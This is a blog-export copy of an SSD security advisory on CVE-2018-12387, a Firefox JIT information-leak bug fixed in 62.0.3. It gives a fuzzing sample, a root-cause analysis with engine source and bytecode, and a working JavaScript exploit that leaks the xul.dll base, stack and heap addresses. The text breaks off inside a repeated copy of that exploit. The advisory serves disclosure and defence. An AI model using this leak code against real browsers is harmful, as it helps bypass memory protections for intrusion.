{"id":13544,"date":"2018-10-09T14:19:05","date_gmt":"2018-10-09T22:19:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/09\/news-7311\/"},"modified":"2018-10-09T14:19:05","modified_gmt":"2018-10-09T22:19:05","slug":"news-7311","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/09\/news-7311\/","title":{"rendered":"SSD Advisory \u2013 Firefox Information Leak"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron | Date: Tue, 09 Oct 2018 08:55:15 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> A vulnerability in the way the JavaScript JIT compiler inlines Array.prototype.push with multiple arguments results in the stack pointer being off by 8 bytes after a bailout. This leaks a memory address to the calling function, which can be used as part of an exploit inside the sandboxed content process.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;Security vulnerabilities fixed in Firefox 62.0.3 and Firefox ESR 60.2.2&#8221;<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-12387<\/p>\n<p><strong>Credit<\/strong><br \/> Independent security researchers Bruno Keith and Niklas Baumstark reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> Firefox 62.0<br \/> Firefox ESR 60.2<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> While fuzzing SpiderMonkey (Mozilla&#8217;s JavaScript engine, written in C++), we triggered a debug assertion with the following minimized sample:<\/p>\n<div id=\"crayon-5bbd2958b1227653244296\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; 
font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">function f(o) {\n\tvar a = [o];\n\ta.length = a[0];\n\tvar useless = function () {}\n\tvar sz = Array.prototype.push.call(a, 42, 43);\n\t(function () {\n\t\tsz;\n\t})(new Boolean(false));\n}\nfor (var i = 0; i &lt; 25000; i++) {\n\tf(1);\n}\nf(2);<\/textarea><\/div>\n<\/div>\n<p>which triggered the following assertion:<\/p>\n<div id=\"crayon-5bbd2958b1232025548673\" class=\"crayon-syntax crayon-theme-terminal crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">Assertion failure: isObject() and crashes in release\n
build<\/textarea><\/div>\n<\/div>\n<p><strong>Root Cause Analysis<\/strong><br \/> The assertion described above fires while running the code generated by the JIT compiler for the function f.<\/p>\n<p>Let\u2019s look at the intermediate representation (IR) of the JIT code:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak.png\" data-slb-active=\"1\" data-slb-asset=\"896111106\" data-slb-internal=\"0\" data-slb-group=\"3766\"><img 
loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3767\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak-182x300.png\" alt=\"Intermediate representation (IR) of the JIT code for f\" width=\"582\" height=\"959\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak-182x300.png 182w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak.png 431w\" sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/a><\/p>\n<p>We can see two arraypusht instructions. This is explained by the code responsible for inlining calls to Array.prototype.push, implemented at <a href=\"https:\/\/dxr.mozilla.org\/mozilla-central\/source\/js\/src\/jit\/MCallOptimize.cpp#812\">https:\/\/dxr.mozilla.org\/mozilla-central\/source\/js\/src\/jit\/MCallOptimize.cpp#812<\/a>. The comments inside that function state that a call to push with multiple arguments is broken down into multiple individual arraypush{t,v} instructions. However, there is some complicated logic associated with bailouts, whose purpose is to preserve the atomicity of the call and not resume execution in between the inlined calls to push. The assertion is triggered because the stack pointer is not correctly restored when bailing out from IonMonkey to the Baseline JIT: it is off by 8 bytes, so a JS_IS_CONSTRUCTING value is fetched from the stack instead of the Boolean class.<\/p>\n<p>Knowing the failure condition, we need to look for opcode handlers in BaselineCompiler.cpp that perform a syncStack(0) and then address stack values via peek(). An interesting one is BaselineCompiler::emit_JSOP_INITPROP:<\/p>\n<div id=\"crayon-5bbd2958b1239302397045\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/\/ Load lhs 
in R0, rhs in R1.\n frame.syncStack(0);\n masm.loadValue(frame.addressOfStackValue(frame.peek(-2)), R0);\n masm.loadValue(frame.addressOfStackValue(frame.peek(-1)), R1);\n \/\/ Call IC.\n ICSetProp_Fallback::Compiler compiler(cx);\n if (!emitOpIC(compiler.getStub(&amp;stubSpace_)))\n     return false;\n \/\/ Leave the object on the stack.\n frame.pop();<\/textarea><\/div>\n<\/div>\n<p>This opcode is emitted for the following JavaScript code:<\/p>\n<div id=\"crayon-5bbd2958b123d687126830\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px 
!important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">function f() {\n\tvar y = {};\n\tvar o = {\n\t\ta: y\n\t};\n}\ndis(f);\n\/* bytecode:\n 00000: newobject ({}) # OBJ\n 00005: setlocal 0 # OBJ\n 00009: pop #\n 00010: newobject ({a:(void 0)}) # OBJ\n 00015: getlocal 0 # OBJ y\n 00019: initprop \"a\" # OBJ\n 00024: setlocal 1 # OBJ\n 00028: pop #\n 00029: retrval #\n*\/<\/textarea><\/div>\n<\/div>\n<p>The handler shows how this opcode is compiled: R0 is loaded from stack[top-1] = o and R1 from stack[top] = y, and then the property assignment R0.a = R1 is performed by an inline cache. Because the stack pointer is shifted, however, the following code performs the assignment stack[top].a = stack[top+1] instead, so a JSValue is fetched from beyond the top of the stack. Due to NaN-boxing, a native pointer value is interpreted as a double in this context.<\/p>\n<div id=\"crayon-5bbd2958b1242943729547\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">var test = {\n\ta: 13.37\n};\n\nfunction f(o) {\n\tvar a = [o];\n\ta.length = a[0];\n\tvar useless = function () {}\n\tuseless + useless;\n\tvar sz = Array.prototype.push.call(a, 1337, 43);\n\t(function () {\n\t\tsz\n\t})();\n\tvar o = {\n\t\ta: test\n\t};\n}\ndis(f);\nfor (var i = 0; i &lt; 25000; i++) {\n\tf(1);\n}\nf(100);\nprint(test.a);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5bbd2958b1242943729547-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<pre><code>var test = {\n\ta: 13.37\n};\n\nfunction f(o) {\n\tvar a = [o];\n\ta.length = a[0];\n\tvar useless = function () {}\n\tuseless + useless;\n\tvar sz = Array.prototype.push.call(a, 1337, 43);\n\t(function () {\n\t\tsz\n\t})();\n\tvar o = {\n\t\ta: test\n\t};\n}\ndis(f);\nfor (var i = 0; i &lt; 25000; i++) {\n\tf(1);\n}\nf(100);\nprint(test.a);<\/code><\/pre>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>
<\/p>\n<\/p>\n<pre><code>\/* bytecode:\n...\n00034: lambda function() {} # FUN\n00039: setlocal 1 # FUN\n00043: pop #\n00044: getlocal 1 # useless\n00048: getlocal 1 # useless useless\n00052: add # (useless + useless)\n00053: pop #\n00054: getgname \"Array\" # Array\n00059: getprop \"prototype\" # Array.prototype\n00064: getprop \"push\" # Array.prototype.push\n00069: dup # Array.prototype.push Array.prototype.push\n00070: callprop \"call\" # Array.prototype.push Array.prototype.push.call\n00075: swap # Array.prototype.push.call Array.prototype.push\n00076: getlocal 0 # Array.prototype.push.call Array.prototype.push a\n00080: uint16 1337 # Array.prototype.push.call Array.prototype.push a 1337\n00083: int8 43 # Array.prototype.push.call Array.prototype.push a 1337 43\n00085: funcall 3 # Array.prototype.push.call(...)\n...\n00104: newobject ({a:(void 0)}) # OBJ\n00109: getgname \"test\" # OBJ test\n00114: initprop \"a\" # OBJ\n00119: setarg 0 # OBJ\n00122: pop #\n00123: retrval #<\/code><\/pre>\n<p>Instruction 48 is there only to place a function on the stack, so that the funcall at instruction 85 does not throw an exception: it expects to fetch Array.prototype.push.call from the stack, but the stack pointer is off by 8 bytes. 
On our system this prints 2.11951350117067e-310, the double whose bit pattern is the integer value 0x27044d565235, which is a return address. The final exploit leverages this to leak a heap address, a stack address and the base address of xul.dll.<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<div id=\"crayon-5bbd2958b124c514799649\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px 
!important; line-height: 16.8px !important;\"><\/div>\n<pre><code>&lt;script&gt;\n\nvar convert = new ArrayBuffer(0x100);\nvar u32 = new Uint32Array(convert);\nvar f64 = new Float64Array(convert);\n\nvar BASE = 0x100000000;\n\nfunction i2f(x) {\n    u32[0] = x % BASE;\n    u32[1] = (x - (x % BASE)) \/ BASE; \/\/\/\n    return f64[0];\n}\n\nfunction f2i(x) {\n    f64[0] = x;\n    return u32[0] + BASE * u32[1];\n}\n\nfunction hex(x) {\n    return `0x${x.toString(16)}`\n}\n\nvar test = {a:0x1337};\n\nfunction gen(m) {\n    var expr = '1+('.repeat(m) + '{a:y}' + ')'.repeat(m);\n\n    var code = `\n    f = function(o) {\n        var y = test;\n        var a = [o];\n        a.length = a[0];\n        var useless = function() { }\n        useless + useless + useless + useless + useless + useless;\n        var sz = Array.prototype.push.call(a, 1337, 43);\n        (function() { sz; })();\n        var o = ${expr};\n    }\n    `;\n    eval(code);\n}\n\nVERSION = '62.0';\n\nfunction exploit() {\n    var xul = 0;\n    var stack = 0;\n    var heap = 0;\n\n    var leak = [];\n    for (var i = 20; i &gt;= 0; --i) {\n        gen(i);\n        for (var j = 0; j &lt; 10000; j++) {\n            f(1);\n        }\n        f(100);\n\n        var x = f2i(test.a);\n\n        leak.push(x);\n    }\n\n    function xulbase(addr) {\n        if (VERSION == '62.0') {\n            var offsets = [\n                0x92fe34,\n                0x3bd4108,\n            ];\n        } else {\n            alert('Unknown version: ' + VERSION);\n            throw null;\n        }\n        var res = 0;\n        offsets.forEach((offset) =&gt; {\n            if (offset % 0x1000 == addr % 0x1000) {\n                res = addr - offset;\n            }\n        });\n        return res;\n    }\n\n    xul = xulbase(leak[1]);\n    stack = leak[0];\n    heap = leak[3];\n\n    var el = document.createElement('pre');\n    el.innerText = (\n        \"XUL.dll base: \" + hex(xul) + \"\\n\" +\n        \"Stack: \" + hex(stack) + \"\\n\" +\n        \"Heap: \" + hex(heap) + \"\\n\" +\n        \"\\nFull leak:\\n\" + leak.map(hex).join(\"\\n\"))\n    document.body.appendChild(el);\n}\n&lt;\/script&gt;\n\n&lt;button onclick=\"exploit()\"&gt;Go&lt;\/button&gt;<\/code><\/pre>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-3\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">convert<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-4\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint32Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">convert<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f64<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">convert<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-7\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-9\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">i2f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f64<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-13\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-15\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">f2i<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">f64<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-18\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-20\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-cn\">0x<\/span><span class=\"crayon-sy\">$<\/span><span 
class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-22\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-24\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x1337<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-26\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">gen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">expr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;1+(&#8216;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">repeat<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{a:y}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;)&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">repeat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">test<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span 